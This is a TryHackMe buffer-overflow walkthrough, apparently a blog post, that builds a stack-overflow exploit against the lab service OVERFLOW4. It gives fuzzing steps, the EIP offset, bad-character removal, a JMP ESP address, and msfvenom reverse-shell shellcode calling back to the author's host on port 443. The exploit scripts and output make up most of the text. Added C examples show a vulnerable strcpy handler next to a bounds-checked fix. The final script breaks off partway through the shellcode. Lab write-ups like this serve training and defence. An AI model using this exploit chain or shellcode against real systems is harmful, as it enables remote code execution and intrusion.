BufferOver Flow — TryHackMe

Anon Tuttu Venus
8 min read · Jan 23, 2021


Walkthrough Fast Forward Video: https://www.youtube.com/watch?v=dHPgRlNW-MU&feature=youtu.be

System IP: 10.10.232.66

Vulnerability Exploited: Buffer Overflow

Vulnerability Fix: To prevent buffer overflows, developers of C/C++ applications should avoid standard library functions that are not bounds-checked, such as gets, scanf, and strcpy, and check every input length against the destination size before copying.
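
As an added example (not code from the room or from the author), here is the C defect class behind this finding next to the bounds-checked handler the fix above describes. The 128-byte buffer size, the handler names and the inputs are assumptions for illustration; the hardened version rejects oversized input instead of truncating it, because a silently truncated command hides the attempt from logs.

```c
/* Added example (not the room's code or the author's): the defect class this
 * walkthrough exploits, next to the bounds-checked form the fix calls for.
 * The buffer size and the handler names are assumptions for illustration. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define CMD_BUF 128   /* assumed size of the fixed stack buffer */

/* VULNERABLE: strcpy() copies until the input's NUL byte with no regard for
 * the destination size, so input longer than CMD_BUF runs past the buffer
 * into the saved frame pointer and return address. That overwritten return
 * address is the "EIP value" the walkthrough measures with a cyclic pattern.
 * Shown only to make the review target concrete; never call it on untrusted
 * input. */
int handle_command_unsafe(const char *input)
{
    char cmd[CMD_BUF];
    strcpy(cmd, input);                 /* no length check */
    return (int)strlen(cmd);
}

/* HARDENED: measure the input with a bounded scan, refuse anything that does
 * not fit (rather than truncating silently, which hides the attack), and copy
 * exactly the checked number of bytes. Returns the length copied or -1. */
int handle_command_safe(const char *input)
{
    char cmd[CMD_BUF];
    /* memchr() stops at the first NUL and never looks past CMD_BUF bytes */
    const char *nul = memchr(input, '\0', CMD_BUF);
    if (nul == NULL) {
        return -1;                      /* too long: reject, log, drop client */
    }
    size_t n = (size_t)(nul - input);
    memcpy(cmd, input, n + 1);          /* n bytes plus terminator, n < CMD_BUF */
    return (int)n;
}

/* Self-check helper: feed len bytes of 'A' (constructed input, like the
 * fuzzer's growing buffer) through the hardened handler, return its verdict. */
int safe_result_for_length(size_t len)
{
    char buf[4096];
    if (len >= sizeof buf) return -2;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return handle_command_safe(buf);
}

int main(void)
{
    printf("15-byte command: %d\n", handle_command_safe("OVERFLOW4 hello"));
    printf("2500 'A' bytes:  %d\n", safe_result_for_length(2500));
    return 0;
}
```

The same 2500-byte buffer that crashes the unsafe handler is refused by the safe one before any copy happens; that refusal is also the natural place to emit a log line, which is what turns an attempt into a detection.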

Severity: Critical

// Run the BOF app on a Windows box.

// Right-click Immunity Debugger → Run As Administrator → File → Open → locate the app → F9 to start

Proof of Concept:

Checking connectivity to the victim machine:

nc 10.10.232.66 1337

// We will run the exploit on OVERFLOW4

Step 1: Fuzzing and Finding the Crash Point

// Fuzzer ( fuzz.py ) used in this example : https://github.com/anontuttuvenus/BOF/blob/main/fuzz.py

After running fuzz.py, the application crashed at around 2100 bytes; this is not the exact offset.

We add 400 bytes of margin to the 2100 and generate a cyclic pattern of 2500 bytes.

To generate the cyclic pattern we use msf-pattern_create.

Step 2: Creating cyclic value with msf-pattern_create

// Exploit ( exploit.py ) used in this example : [ IP will be different ] https://github.com/anontuttuvenus/BOF/blob/main/exploit.py

┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.py
import socket

# Written for Python 2 (str and bytes are the same type, so the fields below
# concatenate and send as-is).
ip = "10.10.232.66"
port = 1337
prefix = "OVERFLOW4 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

Before running the script we need to re-attach the vulnerable app in Immunity: Ctrl+F2 followed by F9.

Now run exploit.py; the program crashes again.

Step 3: Finding the EIP value

To find the EIP offset, we use the mona module:

!mona findmsp -distance 2500

where the distance is the length of the cyclic pattern (2500) that we created.

In the output, mona reports that EIP contains the pattern at offset 2026.

Now that we have the offset we can confirm it. EIP is 4 bytes long: 2026 is where the EIP overwrite starts, so bytes 2026 to 2030 are the EIP value. To confirm this we add 4 * "B" to the script at that offset. Once the script is executed, EIP will read 42424242, the hex equivalent of four B's.

The modified script will be this,

┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.py
import socket

# Python 2 script, as above
ip = "10.10.232.66"
port = 1337
prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "B" * 4
padding = ""
payload = ""
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

Before running the script we need to re-attach the vulnerable app: Ctrl+F2 followed by F9.

EIP value is 42424242

Now we can confirm that the EIP overwrite starts at offset 2026.
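
Steps 1 to 3 above, as an added example that is not the room's or the author's tooling: a C implementation of the pattern msf-pattern_create emits and of the lookup !mona findmsp performs, together with the little-endian decoding of the 32-bit value a debugger shows in EIP. The EIP value 0x70433570 used below is computed from the pattern itself ("p5Cp" at offset 2026), not read from the walkthrough, and the function names are mine. The same lookup works from a crash dump during incident triage, with no debugger attached.

```c
/* Added example (not the room's or the author's tooling): the cyclic pattern
 * msf-pattern_create emits and the lookup !mona findmsp performs, written out
 * so an offset can be recovered from any crash record that shows EIP.
 * The EIP value in main() is computed from the pattern, not taken from the
 * walkthrough. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

/* Fill buf with len bytes of the Metasploit-style pattern "Aa0Aa1...Az9Ba0...":
 * triplets of (upper, lower, digit), cycling the digit fastest. */
void pattern_create(char *buf, size_t len)
{
    size_t i = 0, t = 0;
    while (i < len) {
        char trip[3] = {
            (char)('A' + (t / 260) % 26),
            (char)('a' + (t / 10) % 26),
            (char)('0' + t % 10)
        };
        for (int k = 0; k < 3 && i < len; k++) buf[i++] = trip[k];
        t++;
    }
}

/* Immunity shows EIP as one 32-bit number; on x86 the four pattern bytes that
 * landed there are stored little-endian, so the low byte came first. This is
 * the same reversal the walkthrough applies to the JMP ESP address later. */
void le32_to_bytes(uint32_t v, unsigned char out[4])
{
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Offset of the 4 pattern bytes that produced eip in a len-byte pattern, or -1. */
long pattern_offset(size_t len, uint32_t eip)
{
    unsigned char needle[4];
    long off = -1;
    char *pat = malloc(len);
    if (!pat) return -1;
    pattern_create(pat, len);
    le32_to_bytes(eip, needle);
    for (size_t i = 0; i + 4 <= len; i++) {
        if (memcmp(pat + i, needle, 4) == 0) { off = (long)i; break; }
    }
    free(pat);
    return off;
}

/* Byte at position i of a len-byte pattern, or -1 when out of range. */
int pattern_byte_at(size_t len, size_t i)
{
    if (i >= len) return -1;
    char *pat = malloc(len);
    if (!pat) return -1;
    pattern_create(pat, len);
    int c = (unsigned char)pat[i];
    free(pat);
    return c;
}

int main(void)
{
    /* 0x70433570 is "p5Cp" read little-endian: the bytes at offset 2026 */
    printf("offset of EIP=0x70433570 in a 2500-byte pattern: %ld\n",
           pattern_offset(2500, 0x70433570));
    printf("offset of EIP=0x42424242 (BBBB): %ld\n",
           pattern_offset(2500, 0x42424242));
    return 0;
}
```

A return of -1 for 42424242 is the expected answer after the confirmation step, since four B's are not part of the pattern; any other -1 means the crash did not overwrite the return address with contiguous pattern bytes and the fuzzing length or the prefix needs another look.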

Step 4: Finding Badchars.

// I have used the file below, which contains all the badchars. \x00 is excluded since it is always a badchar. https://github.com/anontuttuvenus/BOF/blob/main/badchars.txt

We need to modify our script: the badchars go into the payload variable.

┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.py
import socket

# Python 2 script, as above
ip = "10.10.232.66"
port = 1337
prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "B" * 4
padding = ""
payload = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

Before running the exploit, we need to re-attach the vulnerable app [ Ctrl+F2 → F9 ].

We can either find the badchars manually or use the mona module. Here I will use the mona module.

Generate a bytearray with mona, excluding the null byte (\x00), which is always a badchar:

!mona bytearray -b "\x00"

Now bytearray.txt and bytearray.bin contain all the candidate bytes. We compare the bytes on the crashed app's stack with bytearray.bin.

For the comparison we need the value of ESP, which we can read from the "CPU" window in Immunity Debugger:

ESP 018AFA30

Let's compare, using the command below:

!mona compare -f C:\mona\oscp\bytearray.bin -a 018AFA30

From the result we can see there are multiple badchars.

BadChars : 00 a9 aa cd ce d4 d5

Not all of these are necessarily badchars! Sometimes a badchar causes the next byte to get corrupted as well, or even affects the rest of the string. That means a9 may be the badchar, and aa, which follows it, got listed as well.

So at first we assume the badchars are `00 a9 cd d4`.

We need to remove "\x00\xa9\xcd\xd4" from the payload in our exploit script and generate a new bytearray with mona that excludes the same chars.

Modified exploit.py

┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.py
import socket

# Python 2 script, as above
ip = "10.10.232.66"
port = 1337
prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "B" * 4
padding = ""
payload = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xce\xcf\xd0"
"\xd1\xd2\xd3\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

Modified bytearray.bin:

!mona bytearray -b "\x00\xa9\xcd\xd4"

We need the value of ESP again for the comparison; read it from the "CPU" window in Immunity Debugger. Don't reuse the previous value, it changes slightly between runs.

ESP 019AFA30

Now let's compare, using the command below:

!mona compare -f C:\mona\oscp\bytearray.bin -a 019AFA30

From the output we can see that no mismatches remain: all the badchars have been removed.

Final BadChars : "\x00\xa9\xcd\xd4"
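
The comparison and the "first of each run" reasoning from Step 4, as an added C example that is not mona's code or the author's. The memory image is constructed to reproduce the first-round mismatch list (a9 aa cd ce d4 d5; 00 is excluded before the comparison here, so it is not reported), and the function names are mine. The point it shows is why aa, ce and d5 are held back for a second round rather than excluded straight away.

```c
/* Added example, not part of the walkthrough or of mona: the byte-by-byte
 * comparison that !mona compare performs, plus the "first of each run" reading
 * the text applies when one bad byte also mangles the byte after it. The memory
 * image below is constructed to mimic the walkthrough's first-round result; it
 * is not a capture from the room. */
#include <stdio.h>
#include <string.h>

#define NBYTES 255   /* candidate values 0x01..0xff; \x00 is excluded up front */

/* Expected array: every value 0x01..0xff in order, which is what bytearray.bin
 * holds when only \x00 has been excluded. */
void expected_bytes(unsigned char out[NBYTES])
{
    for (int i = 0; i < NBYTES; i++) out[i] = (unsigned char)(i + 1);
}

/* Compare the expected array with what was found at ESP. Mismatching expected
 * values are written to diff (ascending, since expected is ascending); returns
 * how many there are. mem_len is how many bytes were actually captured. */
int compare_badchars(const unsigned char *expected, const unsigned char *mem,
                     size_t mem_len, unsigned char *diff, int max_diff)
{
    int n = 0;
    for (size_t i = 0; i < NBYTES; i++) {
        if (i >= mem_len || expected[i] != mem[i]) {
            if (n < max_diff) diff[n] = expected[i];
            n++;
        }
    }
    return n;
}

/* Keep only the first value of each run of consecutive mismatches. A value that
 * directly follows another mismatch may be collateral damage from the one
 * before it, so it is re-tested in the next round instead of being excluded. */
int primary_suspects(const unsigned char *diff, int n, unsigned char *out)
{
    int m = 0;
    for (int i = 0; i < n; i++) {
        if (i == 0 || diff[i] != diff[i - 1] + 1) out[m++] = diff[i];
    }
    return m;
}

/* Constructed memory image: the target mangled 0xa9, 0xcd and 0xd4, and each
 * mangling also clobbered the byte that followed it. Returns bytes written. */
size_t constructed_memory(unsigned char *mem)
{
    expected_bytes(mem);
    mem[0xa9 - 1] = 0x00; mem[0xaa - 1] = 0x00;   /* a9 bad, aa collateral */
    mem[0xcd - 1] = 0x0a; mem[0xce - 1] = 0x00;   /* cd bad, ce collateral */
    mem[0xd4 - 1] = 0x00; mem[0xd5 - 1] = 0x00;   /* d4 bad, d5 collateral */
    return NBYTES;
}

/* One round over the constructed image; fills suspects, returns mismatch count. */
static int first_round(unsigned char *suspects, int *nsuspects)
{
    unsigned char expected[NBYTES], mem[NBYTES], diff[NBYTES];
    expected_bytes(expected);
    size_t len = constructed_memory(mem);
    int n = compare_badchars(expected, mem, len, diff, NBYTES);
    *nsuspects = primary_suspects(diff, n, suspects);
    return n;
}

/* Scalar accessors so the round's result can be checked without arrays. */
int mismatch_count(void)
{
    unsigned char s[NBYTES]; int m;
    return first_round(s, &m);
}

int suspect_at(int k)   /* k-th primary suspect, or -1 past the end */
{
    unsigned char s[NBYTES]; int m;
    first_round(s, &m);
    return (k >= 0 && k < m) ? s[k] : -1;
}

int main(void)
{
    unsigned char s[NBYTES]; int m;
    int n = first_round(s, &m);
    printf("mismatches: %d, primary suspects:", n);
    for (int i = 0; i < m; i++) printf(" %02x", s[i]);
    printf("\n");  /* round 2: rebuild the array without the suspects, compare again */
    return 0;
}
```

The second round in the walkthrough (bytearray regenerated without a9, cd, d4) compared clean, which is the condition for calling the list final; had ce or d5 still differed after their predecessors were removed, they would have become suspects in their own right.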

Step 5: Finding JMP ESP

Once again we use the mona module; the value after -cpb is the full list of badchars:

!mona jmp -r esp -cpb "\x00\xa9\xcd\xd4"

When you execute the command, Immunity Debugger may switch the window to "CPU"; you can change it back from "CPU" to "Log Data".

Output of !mona jmp -r esp -cpb "\x00\xa9\xcd\xd4":

9 pointers are listed and we need to select one of them. Pick one where ASLR, Rebase, and SafeSEH are all False.

I will be using the pointer 625011af.

We need to write this in little-endian format, i.e. af 11 50 62 (bytes in reverse order).

JMP ESP →"\xaf\x11\x50\x62"

Step 6: Creating Shell Code

We can use msfvenom to create the shellcode; when creating it we need to exclude the badchars found earlier.

┌──(root💀kali)-[/opt/BOF]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.9.62.7 LPORT=443 -b "\x00\xa9\xcd\xd4" EXITFUNC=thread -f python -v payload

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes
payload = b""
payload += b"\xb8\xaf\x45\x71\x70\xd9\xf7\xd9\x74\x24\xf4\x5a"
payload += b"\x31\xc9\xb1\x52\x31\x42\x12\x83\xc2\x04\x03\xed"
payload += b"\x4b\x93\x85\x0d\xbb\xd1\x66\xed\x3c\xb6\xef\x08"
payload += b"\x0d\xf6\x94\x59\x3e\xc6\xdf\x0f\xb3\xad\xb2\xbb"
payload += b"\x40\xc3\x1a\xcc\xe1\x6e\x7d\xe3\xf2\xc3\xbd\x62"
payload += b"\x71\x1e\x92\x44\x48\xd1\xe7\x85\x8d\x0c\x05\xd7"
payload += b"\x46\x5a\xb8\xc7\xe3\x16\x01\x6c\xbf\xb7\x01\x91"
payload += b"\x08\xb9\x20\x04\x02\xe0\xe2\xa7\xc7\x98\xaa\xbf"
payload += b"\x04\xa4\x65\x34\xfe\x52\x74\x9c\xce\x9b\xdb\xe1"
payload += b"\xfe\x69\x25\x26\x38\x92\x50\x5e\x3a\x2f\x63\xa5"
payload += b"\x40\xeb\xe6\x3d\xe2\x78\x50\x99\x12\xac\x07\x6a"
payload += b"\x18\x19\x43\x34\x3d\x9c\x80\x4f\x39\x15\x27\x9f"
payload += b"\xcb\x6d\x0c\x3b\x97\x36\x2d\x1a\x7d\x98\x52\x7c"
payload += b"\xde\x45\xf7\xf7\xf3\x92\x8a\x5a\x9c\x57\xa7\x64"
payload += b"\x5c\xf0\xb0\x17\x6e\x5f\x6b\xbf\xc2\x28\xb5\x38"
payload += b"\x24\x03\x01\xd6\xdb\xac\x72\xff\x1f\xf8\x22\x97"
payload += b"\xb6\x81\xa8\x67\x36\x54\x7e\x37\x98\x07\x3f\xe7"
payload += b"\x58\xf8\xd7\xed\x56\x27\xc7\x0e\xbd\x40\x62\xf5"
payload += b"\x56\x65\x7a\xcb\xa1\x11\x7e\x33\xaf\x5a\xf7\xd5"
payload += b"\xc5\x8c\x5e\x4e\x72\x34\xfb\x04\xe3\xb9\xd1\x61"
payload += b"\x23\x31\xd6\x96\xea\xb2\x93\x84\x9b\x32\xee\xf6"
payload += b"\x0a\x4c\xc4\x9e\xd1\xdf\x83\x5e\x9f\xc3\x1b\x09"
payload += b"\xc8\x32\x52\xdf\xe4\x6d\xcc\xfd\xf4\xe8\x37\x45"
payload += b"\x23\xc9\xb6\x44\xa6\x75\x9d\x56\x7e\x75\x99\x02"
payload += b"\x2e\x20\x77\xfc\x88\x9a\x39\x56\x43\x70\x90\x3e"
payload += b"\x12\xba\x23\x38\x1b\x97\xd5\xa4\xaa\x4e\xa0\xdb"
payload += b"\x03\x07\x24\xa4\x79\xb7\xcb\x7f\x3a\xd7\x29\x55"
payload += b"\x37\x70\xf4\x3c\xfa\x1d\x07\xeb\x39\x18\x84\x19"
payload += b"\xc2\xdf\x94\x68\xc7\xa4\x12\x81\xb5\xb5\xf6\xa5"
payload += b"\x6a\xb5\xd2"
--> LHOST=10.9.62.7 [ My IP ]
--> LPORT=443 [ Listen Port ]
--> -b "\x00\xa9\xcd\xd4" [ Badchars ]

We are ready for our final payload.

The final payload will have these values for the variables below:

offset = 2026 [ EIP offset ]
overflow = "A" * offset
retn = "\xaf\x11\x50\x62" [ JMP ESP address, little-endian ]
padding = "\x90" * 16 [ NOP sled ]
payload = shellcode output from msfvenom

exploit.py Final :

┌──(root💀kali)-[/opt/BOF]
└─# cat exploit.py
import socket

# Python 2 script: str and bytes are the same type, so the b"" shellcode
# below concatenates with the str fields without conversion.
ip = "10.10.232.66"
port = 1337
prefix = "OVERFLOW4 "
offset = 2026
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = b""
payload += b"\xb8\xaf\x45\x71\x70\xd9\xf7\xd9\x74\x24\xf4\x5a"
payload += b"\x31\xc9\xb1\x52\x31\x42\x12\x83\xc2\x04\x03\xed"
payload += b"\x4b\x93\x85\x0d\xbb\xd1\x66\xed\x3c\xb6\xef\x08"
payload += b"\x0d\xf6\x94\x59\x3e\xc6\xdf\x0f\xb3\xad\xb2\xbb"
payload += b"\x40\xc3\x1a\xcc\xe1\x6e\x7d\xe3\xf2\xc3\xbd\x62"
payload += b"\x71\x1e\x92\x44\x48\xd1\xe7\x85\x8d\x0c\x05\xd7"
payload += b"\x46\x5a\xb8\xc7\xe3\x16\x01\x6c\xbf\xb7\x01\x91"
payload += b"\x08\xb9\x20\x04\x02\xe0\xe2\xa7\xc7\x98\xaa\xbf"
payload += b"\x04\xa4\x65\x34\xfe\x52\x74\x9c\xce\x9b\xdb\xe1"
payload += b"\xfe\x69\x25\x26\x38\x92\x50\x5e\x3a\x2f\x63\xa5"
payload += b"\x40\xeb\xe6\x3d\xe2\x78\x50\x99\x12\xac\x07\x6a"
payload += b"\x18\x19\x43\x34\x3d\x9c\x80\x4f\x39\x15\x27\x9f"
payload += b"\xcb\x6d\x0c\x3b\x97\x36\x2d\x1a\x7d\x98\x52\x7c"
payload += b"\xde\x45\xf7\xf7\xf3\x92\x8a\x5a\x9c\x57\xa7\x64"
payload += b"\x5c\xf0\xb0\x17\x6e\x5f\x6b\xbf\xc2\x28\xb5\x38"
